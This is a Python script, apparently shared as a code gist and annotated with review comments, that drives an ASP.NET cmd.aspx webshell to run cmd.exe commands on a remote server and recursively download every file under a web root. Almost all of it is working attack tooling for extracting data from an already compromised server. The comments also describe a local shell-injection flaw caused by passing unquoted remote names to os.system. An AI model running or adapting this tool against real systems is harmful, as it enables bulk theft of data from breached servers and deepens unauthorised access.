rsync for .NET // drives an ASP webshell to download all files recursively
import requests | |
import os | |
import os.path | |
import re | |
# using fuzzdb webshell
# https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
# Webshell endpoint that fire() POSTs to; placeholder value.
shell_url = 'https://example.com/vulnerable'
# Pulls the command output out of the webshell's HTML response: the text
# between a <pre> and the last </pre>. DOTALL lets '.' span newlines; the
# leading '.*' is what makes re.match() work on a page that has markup
# before the <pre> block.
cmd_output_re = re.compile(r'.*\<pre\>(.*)\</pre\>', re.DOTALL)
# Used by obtain() to post-process downloaded text. As rendered here, both
# the pattern and the replacement are the literal '<' / '>', so the
# substitution is a no-op. NOTE(review): the page rendering has probably
# decoded HTML entities (&lt; / &gt;) in the original source — confirm
# against the raw file.
lt_re = re.compile(r'<')
gt_re = re.compile(r'>')
# Remote directory root that obtain() walks; Windows-style path.
server_path = r'C:\filepath\web'
# ASP.NET form fields (__VIEWSTATE / __VIEWSTATEGENERATOR) echoed back with
# every POST by fire(); placeholders.
server_viewstate = r'FILLMEUP'
server_viewstate_key = r'FILLMEUP'
def fire(subcommand):
    """Run *subcommand* through the webshell and return its trimmed output.

    Issues one POST to ``shell_url`` carrying the form fields the cmd.aspx
    webshell reads (``xpath`` = cmd.exe, ``xcmd`` = ``/c <subcommand>``, the
    ``Button`` value and the two ASP.NET viewstate fields), then extracts the
    ``<pre>`` body from the returned HTML with ``cmd_output_re``.

    Args:
        subcommand: Command line handed to ``cmd.exe /c``; must be non-empty.

    Returns:
        str: captured command output with leading/trailing whitespace removed.

    Raises:
        AssertionError: if *subcommand* is empty or the response contains no
            ``<pre>…</pre>`` block. Both checks are plain ``assert`` statements
            and disappear under ``python -O``.
    """
    # str(subcommand) is non-empty for any truthy value that reaches it, so the
    # second operand adds no real check.
    assert subcommand and str(subcommand), 'subcommand bad'
    params = dict(
        xpath=r'c:\windows\system32\cmd.exe',
        xcmd='/c %s' % subcommand,
        Button='Run',
        __VIEWSTATEGENERATOR=server_viewstate_key,
        __VIEWSTATE=server_viewstate
    )
    # No timeout is passed, so a server that stops responding blocks the caller
    # indefinitely.
    res = requests.post(shell_url, data=params)
    # Uses the decoded text body, not raw bytes — see obtain() for the
    # consequence on non-text files.
    output_match = cmd_output_re.match(res.text)
    assert output_match, "subcommand failed"
    subcommand_output = output_match.group(1)
    # assert subcommand_output
    return subcommand_output.strip()
def obtain(reldirpath=''):
    """Recursively mirror ``server_path\\reldirpath`` into the local ``output/`` tree.

    Lists files and sub-directories with two ``dir /B`` commands sent through
    fire(), downloads every file with ``type`` (skipping any that already
    exist locally), then recurses into each sub-directory.

    Args:
        reldirpath: Path relative to ``server_path``, backslash-separated;
            the empty string means the root.

    Returns:
        None. Side effects: creates directories and files under ``output/``
        (relative to the current working directory) and prints progress.
    """
    print('\n\nentering directory', reldirpath)
    # directory listing
    # /B = bare names only; /a-d = files only; /ad = directories only.
    files = fire('dir /B /a-d {}\\{}'.format(server_path,reldirpath)).split('\r\n')
    dirs = fire('dir /B /ad {}\\{}'.format(server_path,reldirpath)).split('\r\n')
    # Drop stray whitespace around each listed name.
    files = list(map(str.strip, files))
    dirs = list(map(str.strip, dirs))
    # obtain files
    for filename in files:
        # An empty listing splits to [''] — skip that entry.
        if not filename:
            continue
        # The '\\\\' literal is two backslashes in the resulting string, so
        # the remote path carries a doubled separator; presumably tolerated
        # by cmd.exe — not verified here. Locally it becomes '//' (see below).
        relfilepath = (
            '{}\\\\{}'.format(reldirpath, filename)
            if reldirpath else filename
        )
        # Map every backslash to '/' for the POSIX-side output path.
        unixrelfilepath = re.sub(r'[\\]', r'/', relfilepath)
        local_output_file_path = 'output/' + unixrelfilepath
        # Resume support: a file already on disk is never re-fetched, even if
        # it is partial or empty.
        if not os.path.exists(local_output_file_path):
            print(relfilepath, 'downloading')
            d = fire('type "{}\\{}"'.format(server_path, relfilepath))
            # As rendered, both substitutions replace a character with itself
            # (no-op); NOTE(review): likely HTML-entity decoding of &lt;/&gt;
            # lost in rendering — confirm against the raw source.
            d = lt_re.sub('<', d)
            d = gt_re.sub('>', d)
            # Local-side risk: the directory name originates from the remote
            # 'dir' output and is interpolated unquoted into a shell command,
            # and the same name is used unnormalized in the output path. A
            # name containing shell metacharacters or '..' therefore executes
            # on, or writes outside output/ on, the machine running this
            # script. The remote listing is implicitly trusted.
            os.system('mkdir -p {}'.format(os.path.dirname(local_output_file_path)))
            # Text mode on data that came through res.text and an HTML <pre>
            # block, so non-text files are not reproduced byte-for-byte.
            with open(local_output_file_path, 'w') as fp:
                fp.write(d)
        else:
            print(relfilepath, 'skipping')
    for directory in dirs:
        #if not directory or directory in ('Bin','Css',):
        # continue
        # No blank-name guard here, unlike the file loop: when the directory
        # listing is empty, split() yields [''] and this recurses into
        # reldirpath + '\\'. Termination then depends on what the webshell
        # returns for that path.
        obtain(reldirpath + '\\' + directory)